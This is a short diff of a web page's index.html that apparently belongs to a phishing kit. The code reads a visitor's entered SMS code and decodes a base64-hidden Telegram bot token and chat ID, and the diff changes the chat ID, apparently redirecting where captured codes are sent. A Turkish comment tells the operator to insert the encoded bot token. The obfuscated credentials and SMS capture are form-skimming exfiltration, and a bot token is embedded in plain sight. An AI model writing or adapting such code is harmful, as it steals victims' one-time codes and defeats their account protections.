--- a/index.html
+++ b/index.html
@@ -270,7 +270,7 @@
                                                             var sms = document.getElementById('sms').value;
                                                 
                                                             var botTokenBase64 = 'NjU1NDA1NTAwODpBQUdhcjhUaFRJcTB0MG9fVENGdV9YeFJzMUtkU2VJbG90UQ=='; // Buraya Base64 ile kodlanmış botToken ekleyin
-                                                            var chatIdBase64 = 'NjU1NDA1NTAwOA==';
+                                                            var chatIdBase64 = 'LTEwMDIxMTE3MTE4NzY=';
                                                 
                                                             var botToken = atob(botTokenBase64);
                                                             var chatId = atob(chatIdBase64);
